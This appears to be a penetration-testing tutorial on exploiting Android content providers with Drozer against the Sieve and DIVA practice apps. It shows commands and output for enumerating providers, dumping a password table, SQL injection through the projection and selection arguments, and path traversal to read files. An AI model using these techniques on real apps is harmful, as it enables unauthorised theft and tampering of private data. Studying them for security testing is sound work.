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Data is supplied from one application to others on request by a component known as a content provider. These requests are managed through the ContentResolver class methods. Content providers can store their data in various locations, such as a database, files, or over a network.
In the Manifest.xml file, the declaration of the content provider is required. For instance:
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
To access content://com.mwr.example.sieve.DBContentProvider/Keys
permission is necessary. It's interesting to note that the path /Keys/
is accessible in the following section, which is not protected due to a mistake by the developer, who secured /Keys
but declared /Keys/
Maybe you can access private data or exploit some vulnerability (SQL Injection or Path Traversal).
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
It's possible to piece together how to reach the DBContentProvider by starting URIs with “content://”. This approach is based on insights gained from using Drozer, where key information was located in the /Keys directory.
Drozer can guess and try several URIs:
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
You should also check the ContentProvider code to search for queries:
Also, if you can't find full queries you could check which names are declared by the ContentProvider on the onCreate
The query will be like: content://name.of.package.class/declared_name
Probably most of the Content Providers are used as interface for a database. Therefore, if you can access it you could be able to extract, update, insert and delete information.
Check if you can access sensitive information or try to change it to bypass authorisation mechanisms.
When checking the code of the Content Provider look also for functions named like: query, insert, update and delete:
Because you will be able to call them
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
email: [email protected]
Quering the database you will learn the name of the columns, then, you could be able to insert data in the DB:
Note that in insert and update you can use --string to indicate string, --double to indicate a double, --float, --integer, --long, --short, --boolean
Knowing the name of the columns you could also modify the entries:
It is simple to test for SQL injection (SQLite) by manipulating the projection and selection fields that are passed to the content provider.
When quering the Content Provider there are 2 interesting arguments to search for information: --selection and --projection:
You can try to abuse this parameters to test for SQL injections:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |
| table | Passwords | Passwords | 4 | CREATE TABLE ... |
Automatic SQLInjection discovery by Drozer
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
Injection in Selection:
dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
Content providers could be also used to access files:
You can read files from the Content Provider
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts localhost
If you can access files, you can try to abuse a Path Traversal (in this case this isn't necessary but you can try to use "../" and similar tricks).
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts localhost
Automatic Path Traversal discovery by Drozer
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
- https://www.tutorialspoint.com/android/android_content_providers.htm
- https://manifestsecurity.com/android-application-security-part-15/
- https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
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